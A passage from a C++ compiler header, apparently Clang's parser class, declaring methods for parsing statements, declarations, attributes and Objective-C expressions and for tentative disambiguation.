SourceRange &SpecificationRange,
SmallVectorImpl<ParsedType> &DynamicExceptions,
SmallVectorImpl<SourceRange> &DynamicExceptionRanges,
ExprResult &NoexceptExpr,
CachedTokens *&ExceptionSpecTokens);
// EndLoc is filled with the location of the last token of the specification.
ExceptionSpecificationType ParseDynamicExceptionSpecification(
SourceRange &SpecificationRange,
SmallVectorImpl<ParsedType> &Exceptions,
SmallVectorImpl<SourceRange> &Ranges);
//===--------------------------------------------------------------------===//
// C++0x 8: Function declaration trailing-return-type
TypeResult ParseTrailingReturnType(SourceRange &Range);
//===--------------------------------------------------------------------===//
// C++ 2.13.5: C++ Boolean Literals
ExprResult ParseCXXBoolLiteral();
//===--------------------------------------------------------------------===//
// C++ 5.2.3: Explicit type conversion (functional notation)
ExprResult ParseCXXTypeConstructExpression(const DeclSpec &DS);
/// ParseCXXSimpleTypeSpecifier - [C++ 7.1.5.2] Simple type specifiers.
/// This should only be called when the current token is known to be part of
/// simple-type-specifier.
void ParseCXXSimpleTypeSpecifier(DeclSpec &DS);
bool ParseCXXTypeSpecifierSeq(DeclSpec &DS);
//===--------------------------------------------------------------------===//
// C++ 5.3.4 and 5.3.5: C++ new and delete
bool ParseExpressionListOrTypeId(SmallVectorImpl<Expr*> &Exprs,
Declarator &D);
void ParseDirectNewDeclarator(Declarator &D);
ExprResult ParseCXXNewExpression(bool UseGlobal, SourceLocation Start);
ExprResult ParseCXXDeleteExpression(bool UseGlobal,
SourceLocation Start);
//===--------------------------------------------------------------------===//
// C++ if/switch/while condition expression.
Sema::ConditionResult ParseCXXCondition(StmtResult *InitStmt,
SourceLocation Loc,
Sema::ConditionKind CK);
//===--------------------------------------------------------------------===//
// C++ Coroutines
ExprResult ParseCoyieldExpression();
//===--------------------------------------------------------------------===//
// C99 6.7.8: Initialization.
/// ParseInitializer
/// initializer: [C99 6.7.8]
/// assignment-expression
/// '{' ...
ExprResult ParseInitializer() {
if (Tok.isNot(tok::l_brace))
return ParseAssignmentExpression();
return ParseBraceInitializer();
}
bool MayBeDesignationStart();
ExprResult ParseBraceInitializer();
ExprResult ParseInitializerWithPotentialDesignator();
//===--------------------------------------------------------------------===//
// clang Expressions
ExprResult ParseBlockLiteralExpression(); // ^{...}
//===--------------------------------------------------------------------===//
// Objective-C Expressions
ExprResult ParseObjCAtExpression(SourceLocation AtLocation);
ExprResult ParseObjCStringLiteral(SourceLocation AtLoc);
ExprResult ParseObjCCharacterLiteral(SourceLocation AtLoc);
ExprResult ParseObjCNumericLiteral(SourceLocation AtLoc);
ExprResult ParseObjCBooleanLiteral(SourceLocation AtLoc, bool ArgValue);
ExprResult ParseObjCArrayLiteral(SourceLocation AtLoc);
ExprResult ParseObjCDictionaryLiteral(SourceLocation AtLoc);
ExprResult ParseObjCBoxedExpr(SourceLocation AtLoc);
ExprResult ParseObjCEncodeExpression(SourceLocation AtLoc);
ExprResult ParseObjCSelectorExpression(SourceLocation AtLoc);
ExprResult ParseObjCProtocolExpression(SourceLocation AtLoc);
bool isSimpleObjCMessageExpression();
ExprResult ParseObjCMessageExpression();
ExprResult ParseObjCMessageExpressionBody(SourceLocation LBracloc,
SourceLocation SuperLoc,
ParsedType ReceiverType,
Expr *ReceiverExpr);
ExprResult ParseAssignmentExprWithObjCMessageExprStart(
SourceLocation LBracloc, SourceLocation SuperLoc,
ParsedType ReceiverType, Expr *ReceiverExpr);
bool ParseObjCXXMessageReceiver(bool &IsExpr, void *&TypeOrExpr);
//===--------------------------------------------------------------------===//
// C99 6.8: Statements and Blocks.
/// A SmallVector of statements, with stack size 32 (as that is the only
/// size used).
typedef SmallVector<Stmt*, 32> StmtVector;
/// A SmallVector of expressions, with stack size 12 (the maximum used).
typedef SmallVector<Expr*, 12> ExprVector;
/// A SmallVector of types.
typedef SmallVector<ParsedType, 12> TypeVector;
StmtResult ParseStatement(SourceLocation *TrailingElseLoc = nullptr,
bool AllowOpenMPStandalone = false);
enum AllowedContsructsKind {
/// \brief Allow any declarations, statements, OpenMP directives.
ACK_Any,
/// \brief Allow only statements and non-standalone OpenMP directives.
ACK_StatementsOpenMPNonStandalone,
/// \brief Allow statements and all executable OpenMP directives
ACK_StatementsOpenMPAnyExecutable
};
StmtResult
ParseStatementOrDeclaration(StmtVector &Stmts, AllowedContsructsKind Allowed,
SourceLocation *TrailingElseLoc = nullptr);
StmtResult ParseStatementOrDeclarationAfterAttributes(
StmtVector &Stmts,
AllowedContsructsKind Allowed,
SourceLocation *TrailingElseLoc,
ParsedAttributesWithRange &Attrs);
StmtResult ParseExprStatement();
StmtResult ParseLabeledStatement(ParsedAttributesWithRange &attrs);
StmtResult ParseCaseStatement(bool MissingCase = false,
ExprResult Expr = ExprResult());
StmtResult ParseDefaultStatement();
StmtResult ParseCompoundStatement(bool isStmtExpr = false);
StmtResult ParseCompoundStatement(bool isStmtExpr,
unsigned ScopeFlags);
void ParseCompoundStatementLeadingPragmas();
StmtResult ParseCompoundStatementBody(bool isStmtExpr = false);
bool ParseParenExprOrCondition(StmtResult *InitStmt,
Sema::ConditionResult &CondResult,
SourceLocation Loc,
Sema::ConditionKind CK);
StmtResult ParseIfStatement(SourceLocation *TrailingElseLoc);
StmtResult ParseSwitchStatement(SourceLocation *TrailingElseLoc);
StmtResult ParseWhileStatement(SourceLocation *TrailingElseLoc);
StmtResult ParseDoStatement();
StmtResult ParseForStatement(SourceLocation *TrailingElseLoc);
StmtResult ParseGotoStatement();
StmtResult ParseContinueStatement();
StmtResult ParseBreakStatement();
StmtResult ParseReturnStatement();
StmtResult ParseAsmStatement(bool &msAsm);
StmtResult ParseMicrosoftAsmStatement(SourceLocation AsmLoc);
StmtResult ParsePragmaLoopHint(StmtVector &Stmts,
AllowedContsructsKind Allowed,
SourceLocation *TrailingElseLoc,
ParsedAttributesWithRange &Attrs);
/// \brief Describes the action that should be taken for an __if_exists
/// block.
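///
/// A minimal sketch of the construct being handled (names are
/// illustrative):
///
///   __if_exists(S::f) {
///     // these tokens are parsed, skipped, or treated as dependent,
///     // according to the IfExistsBehavior chosen for S::f
///   }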
enum IfExistsBehavior {
/// \brief Parse the block; this code is always used.
IEB_Parse,
/// \brief Skip the block entirely; this code is never used.
IEB_Skip,
/// \brief Parse the block as a dependent block, which may be used in
/// some template instantiations but not others.
IEB_Dependent
};
/// \brief Describes the condition of a Microsoft __if_exists or
/// __if_not_exists block.
struct IfExistsCondition {
/// \brief The location of the initial keyword.
SourceLocation KeywordLoc;
/// \brief Whether this is an __if_exists block (rather than an
/// __if_not_exists block).
bool IsIfExists;
/// \brief Nested-name-specifier preceding the name.
CXXScopeSpec SS;
/// \brief The name we're looking for.
UnqualifiedId Name;
/// \brief The behavior this __if_exists or __if_not_exists block
/// should follow.
IfExistsBehavior Behavior;
};
bool ParseMicrosoftIfExistsCondition(IfExistsCondition& Result);
void ParseMicrosoftIfExistsStatement(StmtVector &Stmts);
void ParseMicrosoftIfExistsExternalDeclaration();
void ParseMicrosoftIfExistsClassDeclaration(DeclSpec::TST TagType,
AccessSpecifier& CurAS);
bool ParseMicrosoftIfExistsBraceInitializer(ExprVector &InitExprs,
bool &InitExprsOk);
bool ParseAsmOperandsOpt(SmallVectorImpl<IdentifierInfo *> &Names,
SmallVectorImpl<Expr *> &Constraints,
SmallVectorImpl<Expr *> &Exprs);
//===--------------------------------------------------------------------===//
// C++ 6: Statements and Blocks
StmtResult ParseCXXTryBlock();
StmtResult ParseCXXTryBlockCommon(SourceLocation TryLoc, bool FnTry = false);
StmtResult ParseCXXCatchBlock(bool FnCatch = false);
//===--------------------------------------------------------------------===//
// MS: SEH Statements and Blocks
StmtResult ParseSEHTryBlock();
StmtResult ParseSEHExceptBlock(SourceLocation Loc);
StmtResult ParseSEHFinallyBlock(SourceLocation Loc);
StmtResult ParseSEHLeaveStatement();
//===--------------------------------------------------------------------===//
// Objective-C Statements
StmtResult ParseObjCAtStatement(SourceLocation atLoc);
StmtResult ParseObjCTryStmt(SourceLocation atLoc);
StmtResult ParseObjCThrowStmt(SourceLocation atLoc);
StmtResult ParseObjCSynchronizedStmt(SourceLocation atLoc);
StmtResult ParseObjCAutoreleasePoolStmt(SourceLocation atLoc);
//===--------------------------------------------------------------------===//
// C99 6.7: Declarations.
/// A context for parsing declaration specifiers. TODO: flesh this
/// out; there are other significant restrictions on specifiers that
/// would be best implemented in the parser.
enum DeclSpecContext {
DSC_normal, // normal context
DSC_class, // class context, enables 'friend'
DSC_type_specifier, // C++ type-specifier-seq or C specifier-qualifier-list
DSC_trailing, // C++11 trailing-type-specifier in a trailing return type
DSC_alias_declaration, // C++11 type-specifier-seq in an alias-declaration
DSC_top_level, // top-level/namespace declaration context
DSC_template_type_arg, // template type argument context
DSC_objc_method_result, // ObjC method result context, enables 'instancetype'
DSC_condition // condition declaration context
};
/// Is this a context in which we are parsing just a type-specifier (or
/// trailing-type-specifier)?
static bool isTypeSpecifier(DeclSpecContext DSC) {
switch (DSC) {
case DSC_normal:
case DSC_class:
case DSC_top_level:
case DSC_objc_method_result:
case DSC_condition:
return false;
case DSC_template_type_arg:
case DSC_type_specifier:
case DSC_trailing:
case DSC_alias_declaration:
return true;
}
llvm_unreachable("Missing DeclSpecContext case");
}
/// Information on a C++0x for-range-initializer found while parsing a
/// declaration which turns out to be a for-range-declaration.
struct ForRangeInit {
SourceLocation ColonLoc;
ExprResult RangeExpr;
bool ParsedForRangeDecl() { return !ColonLoc.isInvalid(); }
};
DeclGroupPtrTy ParseDeclaration(unsigned Context, SourceLocation &DeclEnd,
ParsedAttributesWithRange &attrs);
DeclGroupPtrTy ParseSimpleDeclaration(unsigned Context,
SourceLocation &DeclEnd,
ParsedAttributesWithRange &attrs,
bool RequireSemi,
ForRangeInit *FRI = nullptr);
bool MightBeDeclarator(unsigned Context);
DeclGroupPtrTy ParseDeclGroup(ParsingDeclSpec &DS, unsigned Context,
SourceLocation *DeclEnd = nullptr,
ForRangeInit *FRI = nullptr);
Decl *ParseDeclarationAfterDeclarator(Declarator &D,
const ParsedTemplateInfo &TemplateInfo = ParsedTemplateInfo());
bool ParseAsmAttributesAfterDeclarator(Declarator &D);
Decl *ParseDeclarationAfterDeclaratorAndAttributes(
Declarator &D,
const ParsedTemplateInfo &TemplateInfo = ParsedTemplateInfo(),
ForRangeInit *FRI = nullptr);
Decl *ParseFunctionStatementBody(Decl *Decl, ParseScope &BodyScope);
Decl *ParseFunctionTryBlock(Decl *Decl, ParseScope &BodyScope);
/// \brief When in code-completion, skip parsing of the function/method body
/// unless the body contains the code-completion point.
///
/// \returns true if the function body was skipped.
bool trySkippingFunctionBody();
bool ParseImplicitInt(DeclSpec &DS, CXXScopeSpec *SS,
const ParsedTemplateInfo &TemplateInfo,
AccessSpecifier AS, DeclSpecContext DSC,
ParsedAttributesWithRange &Attrs);
DeclSpecContext getDeclSpecContextFromDeclaratorContext(unsigned Context);
void ParseDeclarationSpecifiers(DeclSpec &DS,
const ParsedTemplateInfo &TemplateInfo = ParsedTemplateInfo(),
AccessSpecifier AS = AS_none,
DeclSpecContext DSC = DSC_normal,
LateParsedAttrList *LateAttrs = nullptr);
bool DiagnoseMissingSemiAfterTagDefinition(DeclSpec &DS, AccessSpecifier AS,
DeclSpecContext DSContext,
LateParsedAttrList *LateAttrs = nullptr);
void ParseSpecifierQualifierList(DeclSpec &DS, AccessSpecifier AS = AS_none,
DeclSpecContext DSC = DSC_normal);
void ParseObjCTypeQualifierList(ObjCDeclSpec &DS,
Declarator::TheContext Context);
void ParseEnumSpecifier(SourceLocation TagLoc, DeclSpec &DS,
const ParsedTemplateInfo &TemplateInfo,
AccessSpecifier AS, DeclSpecContext DSC);
void ParseEnumBody(SourceLocation StartLoc, Decl *TagDecl);
void ParseStructUnionBody(SourceLocation StartLoc, unsigned TagType,
Decl *TagDecl);
void ParseStructDeclaration(
ParsingDeclSpec &DS,
llvm::function_ref<void(ParsingFieldDeclarator &)> FieldsCallback);
bool isDeclarationSpecifier(bool DisambiguatingWithExpression = false);
bool isTypeSpecifierQualifier();
/// isKnownToBeTypeSpecifier - Return true if we know that the specified token
/// is definitely a type-specifier. Return false if it isn't part of a type
/// specifier or if we're not sure.
bool isKnownToBeTypeSpecifier(const Token &Tok) const;
/// \brief Return true if we know that we are definitely looking at a
/// decl-specifier that isn't part of an expression such as a function-style
/// cast. Return false if it's not a decl-specifier, or we're not sure.
bool isKnownToBeDeclarationSpecifier() {
if (getLangOpts().CPlusPlus)
return isCXXDeclarationSpecifier() == TPResult::True;
return isDeclarationSpecifier(true);
}
/// isDeclarationStatement - Disambiguates between a declaration or an
/// expression statement, when parsing function bodies.
/// Returns true for declaration, false for expression.
bool isDeclarationStatement() {
if (getLangOpts().CPlusPlus)
return isCXXDeclarationStatement();
return isDeclarationSpecifier(true);
}
/// isForInitDeclaration - Disambiguates between a declaration or an
/// expression in the context of the C 'clause-1' or the C++
/// 'for-init-statement' part of a 'for' statement.
/// Returns true for declaration, false for expression.
bool isForInitDeclaration() {
if (getLangOpts().CPlusPlus)
return isCXXSimpleDeclaration(/*AllowForRangeDecl=*/true);
return isDeclarationSpecifier(true);
}
/// \brief Determine whether this is a C++1z for-range-identifier.
bool isForRangeIdentifier();
/// \brief Determine whether we are currently at the start of an Objective-C
/// class message that appears to be missing the open bracket '['.
bool isStartOfObjCClassMessageMissingOpenBracket();
/// \brief Starting with a scope specifier, identifier, or
/// template-id that refers to the current class, determine whether
/// this is a constructor declarator.
bool isConstructorDeclarator(bool Unqualified);
/// \brief Specifies the context in which type-id/expression
/// disambiguation will occur.
enum TentativeCXXTypeIdContext {
TypeIdInParens,
TypeIdUnambiguous,
TypeIdAsTemplateArgument
};
/// isTypeIdInParens - Assumes that a '(' was parsed and now we want to know
/// whether the parens contain an expression or a type-id.
/// Returns true for a type-id and false for an expression.
bool isTypeIdInParens(bool &isAmbiguous) {
if (getLangOpts().CPlusPlus)
return isCXXTypeId(TypeIdInParens, isAmbiguous);
isAmbiguous = false;
return isTypeSpecifierQualifier();
}
bool isTypeIdInParens() {
bool isAmbiguous;
return isTypeIdInParens(isAmbiguous);
}
/// \brief Checks whether the current tokens form a type-id or an expression.
/// It is similar to isTypeIdInParens but does not assume that the type-id
/// is in parentheses.
bool isTypeIdUnambiguously() {
bool IsAmbiguous;
if (getLangOpts().CPlusPlus)
return isCXXTypeId(TypeIdUnambiguous, IsAmbiguous);
return isTypeSpecifierQualifier();
}
/// isCXXDeclarationStatement - C++-specialized function that disambiguates
/// between a declaration or an expression statement, when parsing function
/// bodies. Returns true for declaration, false for expression.
bool isCXXDeclarationStatement();
/// isCXXSimpleDeclaration - C++-specialized function that disambiguates
/// between a simple-declaration or an expression-statement.
/// If during the disambiguation process a parsing error is encountered,
/// the function returns true to let the declaration parsing code handle it.
/// Returns false if the statement is disambiguated as expression.
bool isCXXSimpleDeclaration(bool AllowForRangeDecl);
/// isCXXFunctionDeclarator - Disambiguates between a function declarator or
/// a constructor-style initializer, when parsing declaration statements.
/// Returns true for function declarator and false for constructor-style
/// initializer. Sets 'IsAmbiguous' to true to indicate that this declaration
/// might be a constructor-style initializer.
/// If during the disambiguation process a parsing error is encountered,
/// the function returns true to let the declaration parsing code handle it.
bool isCXXFunctionDeclarator(bool *IsAmbiguous = nullptr);
struct ConditionDeclarationOrInitStatementState;
enum class ConditionOrInitStatement {
Expression, ///< Disambiguated as an expression (either kind).
ConditionDecl, ///< Disambiguated as the declaration form of condition.
InitStmtDecl, ///< Disambiguated as a simple-declaration init-statement.
Error ///< Can't be any of the above!
};
/// \brief Disambiguates between the different kinds of things that can happen
/// after 'if (' or 'switch ('. This could be one of two different kinds of
/// declaration (depending on whether there is a ';' later) or an expression.
ConditionOrInitStatement
isCXXConditionDeclarationOrInitStatement(bool CanBeInitStmt);
bool isCXXTypeId(TentativeCXXTypeIdContext Context, bool &isAmbiguous);
bool isCXXTypeId(TentativeCXXTypeIdContext Context) {
bool isAmbiguous;
return isCXXTypeId(Context, isAmbiguous);
}
/// TPResult - Used as the result value for functions whose purpose is to
/// disambiguate C++ constructs by "tentatively parsing" them.
enum class TPResult {
True, False, Ambiguous, Error
};
/// \brief Based only on the given token kind, determine whether we know that
/// we're at the start of an expression or a type-specifier-seq (which may
/// be an expression, in C++).
///
/// This routine does not attempt to resolve any of the tricky cases, e.g.,
/// those involving lookup of identifiers.
///
/// \returns \c TPResult::True if this token starts an expression,
/// \c TPResult::False if this token starts a type-specifier-seq, or
/// \c TPResult::Ambiguous if it cannot tell.
TPResult isExpressionOrTypeSpecifierSimple(tok::TokenKind Kind);
/// isCXXDeclarationSpecifier - Returns TPResult::True if it is a
/// declaration specifier, TPResult::False if it is not,
/// TPResult::Ambiguous if it could be either a decl-specifier or a
/// function-style cast, and TPResult::Error if a parsing error was
/// encountered. If it could be a braced C++11 function-style cast, returns
/// BracedCastResult.
/// Doesn't consume tokens.
TPResult
isCXXDeclarationSpecifier(TPResult BracedCastResult = TPResult::False,
bool *HasMissingTypename = nullptr);
/// Given that isCXXDeclarationSpecifier returns \c TPResult::True or
/// \c TPResult::Ambiguous, determine whether the decl-specifier would be
/// a type-specifier other than a cv-qualifier.
bool isCXXDeclarationSpecifierAType();
/// \brief Determine whether an identifier has been tentatively declared as a
/// non-type. Such tentative declarations should not be found to name a type
/// during a tentative parse, but also should not be annotated as a non-type.
bool isTentativelyDeclared(IdentifierInfo *II);
// "Tentative parsing" functions, used for disambiguation. If a parsing error
// is encountered they will return TPResult::Error.
// Returning TPResult::True/False indicates that the ambiguity was
// resolved and tentative parsing may stop. TPResult::Ambiguous indicates
// that more tentative parsing is necessary for disambiguation.
// They all consume tokens, so backtracking should be used after calling them.
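//
// A hedged sketch of the pattern (illustrative only):
//
//   RevertingTentativeParsingAction PA(*this);
//   TPResult TPR = TryParseSimpleDeclaration(/*AllowForRangeDecl=*/false);
//   // PA reverts the consumed tokens on scope exit; act on TPR afterwards.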
TPResult TryParseSimpleDeclaration(bool AllowForRangeDecl);
TPResult TryParseTypeofSpecifier();
TPResult TryParseProtocolQualifiers();
TPResult TryParsePtrOperatorSeq();
TPResult TryParseOperatorId();
TPResult TryParseInitDeclaratorList();
TPResult TryParseDeclarator(bool mayBeAbstract, bool mayHaveIdentifier=true);
TPResult
TryParseParameterDeclarationClause(bool *InvalidAsDeclaration = nullptr,
bool VersusTemplateArg = false);
TPResult TryParseFunctionDeclarator();
TPResult TryParseBracketDeclarator();
TPResult TryConsumeDeclarationSpecifier();
public:
TypeResult ParseTypeName(SourceRange *Range = nullptr,
Declarator::TheContext Context
= Declarator::TypeNameContext,
AccessSpecifier AS = AS_none,
Decl **OwnedType = nullptr,
ParsedAttributes *Attrs = nullptr);
private:
void ParseBlockId(SourceLocation CaretLoc);
// Check for the start of a C++11 attribute-specifier-seq in a context where
// an attribute is not allowed.
bool CheckProhibitedCXX11Attribute() {
assert(Tok.is(tok::l_square));
if (!getLangOpts().CPlusPlus11 || NextToken().isNot(tok::l_square))
return false;
return DiagnoseProhibitedCXX11Attribute();
}
bool DiagnoseProhibitedCXX11Attribute();
void CheckMisplacedCXX11Attribute(ParsedAttributesWithRange &Attrs,
SourceLocation CorrectLocation) {
if (!getLangOpts().CPlusPlus11)
return;
if ((Tok.isNot(tok::l_square) || NextToken().isNot(tok::l_square)) &&
Tok.isNot(tok::kw_alignas))
return;
DiagnoseMisplacedCXX11Attribute(Attrs, CorrectLocation);
}
void DiagnoseMisplacedCXX11Attribute(ParsedAttributesWithRange &Attrs,
SourceLocation CorrectLocation);
void stripTypeAttributesOffDeclSpec(ParsedAttributesWithRange &Attrs,
DeclSpec &DS, Sema::TagUseKind TUK);
void ProhibitAttributes(ParsedAttributesWithRange &attrs) {
if (!attrs.Range.isValid()) return;
DiagnoseProhibitedAttributes(attrs);
attrs.clear();
}
void DiagnoseProhibitedAttributes(ParsedAttributesWithRange &attrs);
// Forbid C++11 attributes that appear in certain syntactic
// locations where the standard permits them but we don't support them yet,
// for example, attributes that appertain to decl-specifiers.
void ProhibitCXX11Attributes(ParsedAttributesWithRange &Attrs,
unsigned DiagID);
/// \brief Skip C++11 attributes and return the end location of the last one.
/// \returns SourceLocation() if there are no attributes.
SourceLocation SkipCXX11Attributes();
/// \brief Diagnose and skip C++11 attributes that appear in syntactic
/// locations where attributes are not allowed.
void DiagnoseAndSkipCXX11Attributes();
/// \brief Parses syntax-generic attribute arguments for attributes which are
/// known to the implementation, and adds them to the given ParsedAttributes
/// list with the given attribute syntax. Returns the number of arguments
/// parsed for the attribute.
unsigned
ParseAttributeArgsCommon(IdentifierInfo *AttrName, SourceLocation AttrNameLoc,
ParsedAttributes &Attrs, SourceLocation *EndLoc,
IdentifierInfo *ScopeName, SourceLocation ScopeLoc,
AttributeList::Syntax Syntax);
void MaybeParseGNUAttributes(Declarator &D,
LateParsedAttrList *LateAttrs = nullptr) {
if (Tok.is(tok::kw___attribute)) {
ParsedAttributes attrs(AttrFactory);
SourceLocation endLoc;
ParseGNUAttributes(attrs, &endLoc, LateAttrs, &D);
D.takeAttributes(attrs, endLoc);
}
}
void MaybeParseGNUAttributes(ParsedAttributes &attrs,
SourceLocation *endLoc = nullptr,
LateParsedAttrList *LateAttrs = nullptr) {
if (Tok.is(tok::kw___attribute))
ParseGNUAttributes(attrs, endLoc, LateAttrs);
}
void ParseGNUAttributes(ParsedAttributes &attrs,
SourceLocation *endLoc = nullptr,
LateParsedAttrList *LateAttrs = nullptr,
Declarator *D = nullptr);
void ParseGNUAttributeArgs(IdentifierInfo *AttrName,
SourceLocation AttrNameLoc,
ParsedAttributes &Attrs,
SourceLocation *EndLoc,
IdentifierInfo *ScopeName,
SourceLocation ScopeLoc,
AttributeList::Syntax Syntax,
Declarator *D);
IdentifierLoc *ParseIdentifierLoc();
void MaybeParseCXX11Attributes(Declarator &D) {
if (getLangOpts().CPlusPlus11 && isCXX11AttributeSpecifier()) {
ParsedAttributesWithRange attrs(AttrFactory);
SourceLocation endLoc;
ParseCXX11Attributes(attrs, &endLoc);
D.takeAttributes(attrs, endLoc);
}
}
void MaybeParseCXX11Attributes(ParsedAttributes &attrs,
SourceLocation *endLoc = nullptr) {
if (getLangOpts().CPlusPlus11 && isCXX11AttributeSpecifier()) {
ParsedAttributesWithRange attrsWithRange(AttrFactory);
ParseCXX11Attributes(attrsWithRange, endLoc);
attrs.takeAllFrom(attrsWithRange);
}
}
void MaybeParseCXX11Attributes(ParsedAttributesWithRange &attrs,
SourceLocation *endLoc = nullptr,
bool OuterMightBeMessageSend = false) {
if (getLangOpts().CPlusPlus11 &&
isCXX11AttributeSpecifier(false, OuterMightBeMessageSend))
ParseCXX11Attributes(attrs, endLoc);
}
void ParseCXX11AttributeSpecifier(ParsedAttributes &attrs,
SourceLocation *EndLoc = nullptr);
void ParseCXX11Attributes(ParsedAttributesWithRange &attrs,
SourceLocation *EndLoc = nullptr);
/// \brief Parses a C++-style attribute argument list. Returns true if this
/// results in adding an attribute to the ParsedAttributes list.
bool ParseCXX11AttributeArgs(IdentifierInfo *AttrName,
SourceLocation AttrNameLoc,
ParsedAttributes &Attrs, SourceLocation *EndLoc,
IdentifierInfo *ScopeName,
SourceLocation ScopeLoc);
IdentifierInfo *TryParseCXX11AttributeIdentifier(SourceLocation &Loc);
void MaybeParseMicrosoftAttributes(ParsedAttributes &attrs,
SourceLocation *endLoc = nullptr) {
if (getLangOpts().MicrosoftExt && Tok.is(tok::l_square))
ParseMicrosoftAttributes(attrs, endLoc);
}
void ParseMicrosoftUuidAttributeArgs(ParsedAttributes &Attrs);
void ParseMicrosoftAttributes(ParsedAttributes &attrs,
SourceLocation *endLoc = nullptr);
void MaybeParseMicrosoftDeclSpecs(ParsedAttributes &Attrs,
SourceLocation *End = nullptr) {
const auto &LO = getLangOpts();
if (LO.DeclSpecKeyword && Tok.is(tok::kw___declspec))
ParseMicrosoftDeclSpecs(Attrs, End);
}
void ParseMicrosoftDeclSpecs(ParsedAttributes &Attrs,
SourceLocation *End = nullptr);
bool ParseMicrosoftDeclSpecArgs(IdentifierInfo *AttrName,
SourceLocation AttrNameLoc,
ParsedAttributes &Attrs);
void ParseMicrosoftTypeAttributes(ParsedAttributes &attrs);
void DiagnoseAndSkipExtendedMicrosoftTypeAttributes();
SourceLocation SkipExtendedMicrosoftTypeAttributes();
void ParseMicrosoftInheritanceClassAttributes(ParsedAttributes &attrs);
void ParseBorlandTypeAttributes(ParsedAttributes &attrs);
void ParseOpenCLKernelAttributes(ParsedAttributes &attrs);
void ParseOpenCLQualifiers(ParsedAttributes &Attrs);
/// \brief Parses opencl_unroll_hint attribute if language is OpenCL v2.0
/// or higher.
/// \return false if error happens.
bool MaybeParseOpenCLUnrollHintAttribute(ParsedAttributes &Attrs) {
if (getLangOpts().OpenCL)
return ParseOpenCLUnrollHintAttribute(Attrs);
return true;
}
/// \brief Parses opencl_unroll_hint attribute.
/// \return false if error happens.
bool ParseOpenCLUnrollHintAttribute(ParsedAttributes &Attrs);
void ParseNullabilityTypeSpecifiers(ParsedAttributes &attrs);
VersionTuple ParseVersionTuple(SourceRange &Range);
void ParseAvailabilityAttribute(IdentifierInfo &Availability,
SourceLocation AvailabilityLoc,
ParsedAttributes &attrs,
SourceLocation *endLoc,
IdentifierInfo *ScopeName,
SourceLocation ScopeLoc,
AttributeList::Syntax Syntax);
Optional<AvailabilitySpec> ParseAvailabilitySpec();
ExprResult ParseAvailabilityCheckExpr(SourceLocation StartLoc);
void ParseObjCBridgeRelatedAttribute(IdentifierInfo &ObjCBridgeRelated,
SourceLocation ObjCBridgeRelatedLoc,
ParsedAttributes &attrs,
SourceLocation *endLoc,
IdentifierInfo *ScopeName,
SourceLocation ScopeLoc,
AttributeList::Syntax Syntax);
void ParseTypeTagForDatatypeAttribute(IdentifierInfo &AttrName,
SourceLocation AttrNameLoc,
ParsedAttributes &Attrs,
SourceLocation *EndLoc,
IdentifierInfo *ScopeName,
SourceLocation ScopeLoc,
AttributeList::Syntax Syntax);
void ParseAttributeWithTypeArg(IdentifierInfo &AttrName,
SourceLocation AttrNameLoc,
ParsedAttributes &Attrs,
SourceLocation *EndLoc,
IdentifierInfo *ScopeName,
SourceLocation ScopeLoc,
AttributeList::Syntax Syntax);
void ParseTypeofSpecifier(DeclSpec &DS);
SourceLocation ParseDecltypeSpecifier(DeclSpec &DS);
void AnnotateExistingDecltypeSpecifier(const DeclSpec &DS,
SourceLocation StartLoc,
SourceLocation EndLoc);
void ParseUnderlyingTypeSpecifier(DeclSpec &DS);
void ParseAtomicSpecifier(DeclSpec &DS);
ExprResult ParseAlignArgument(SourceLocation Start,
SourceLocation &EllipsisLoc);
void ParseAlignmentSpecifier(ParsedAttributes &Attrs,
SourceLocation *endLoc = nullptr);
VirtSpecifiers::Specifier isCXX11VirtSpecifier(const Token &Tok) const;
VirtSpecifiers::Specifier isCXX11VirtSpecifier() const {
return isCXX11VirtSpecifier(Tok);
}
void ParseOptionalCXX11VirtSpecifierSeq(VirtSpecifiers &VS, bool IsInterface,
SourceLocation FriendLoc);
bool isCXX11FinalKeyword() const;
/// DeclaratorScopeObj - RAII object used in Parser::ParseDirectDeclarator to
/// enter a new C++ declarator scope and exit it when the function is
/// finished.
class DeclaratorScopeObj {
Parser &P;
CXXScopeSpec &SS;
bool EnteredScope;
bool CreatedScope;
public:
DeclaratorScopeObj(Parser &p, CXXScopeSpec &ss)
: P(p), SS(ss), EnteredScope(false), CreatedScope(false) {}
void EnterDeclaratorScope() {
assert(!EnteredScope && "Already entered the scope!");
assert(SS.isSet() && "C++ scope was not set!");
CreatedScope = true;
P.EnterScope(0); // Not a decl scope.
if (!P.Actions.ActOnCXXEnterDeclaratorScope(P.getCurScope(), SS))
EnteredScope = true;
}
~DeclaratorScopeObj() {
if (EnteredScope) {
assert(SS.isSet() && "C++ scope was cleared ?");
P.Actions.ActOnCXXExitDeclaratorScope(P.getCurScope(), SS);
}
if (CreatedScope)
P.ExitScope();
}
};
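// Typical use (a sketch, mirroring how Parser::ParseDirectDeclarator drives
// this RAII object): construct it up front, enter the scope only when a
// scope specifier is actually present, and let the destructor restore state
// on every exit path:
//   DeclaratorScopeObj DeclScopeObj(*this, D.getCXXScopeSpec());
//   if (D.getCXXScopeSpec().isValid())
//     DeclScopeObj.EnterDeclaratorScope();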
/// ParseDeclarator - Parse and verify a newly-initialized declarator.
void ParseDeclarator(Declarator &D);
/// A function that parses a variant of direct-declarator.
typedef void (Parser::*DirectDeclParseFunction)(Declarator&);
void ParseDeclaratorInternal(Declarator &D,
DirectDeclParseFunction DirectDeclParser);
enum AttrRequirements {
AR_NoAttributesParsed = 0, ///< No attributes are diagnosed.
AR_GNUAttributesParsedAndRejected = 1 << 0, ///< Diagnose GNU attributes.
AR_GNUAttributesParsed = 1 << 1,
AR_CXX11AttributesParsed = 1 << 2,
AR_DeclspecAttributesParsed = 1 << 3,
AR_AllAttributesParsed = AR_GNUAttributesParsed |
AR_CXX11AttributesParsed |
AR_DeclspecAttributesParsed,
AR_VendorAttributesParsed = AR_GNUAttributesParsed |
AR_DeclspecAttributesParsed
};
void ParseTypeQualifierListOpt(DeclSpec &DS,
unsigned AttrReqs = AR_AllAttributesParsed,
bool AtomicAllowed = true,
bool IdentifierRequired = false);
void ParseDirectDeclarator(Declarator &D);
void ParseDecompositionDeclarator(Declarator &D);
void ParseParenDeclarator(Declarator &D);
void ParseFunctionDeclarator(Declarator &D,
ParsedAttributes &attrs,
BalancedDelimiterTracker &Tracker,
bool IsAmbiguous,
bool RequiresArg = false);
bool ParseRefQualifier(bool &RefQualifierIsLValueRef,
SourceLocation &RefQualifierLoc);
bool isFunctionDeclaratorIdentifierList();
void ParseFunctionDeclaratorIdentifierList(
Declarator &D,
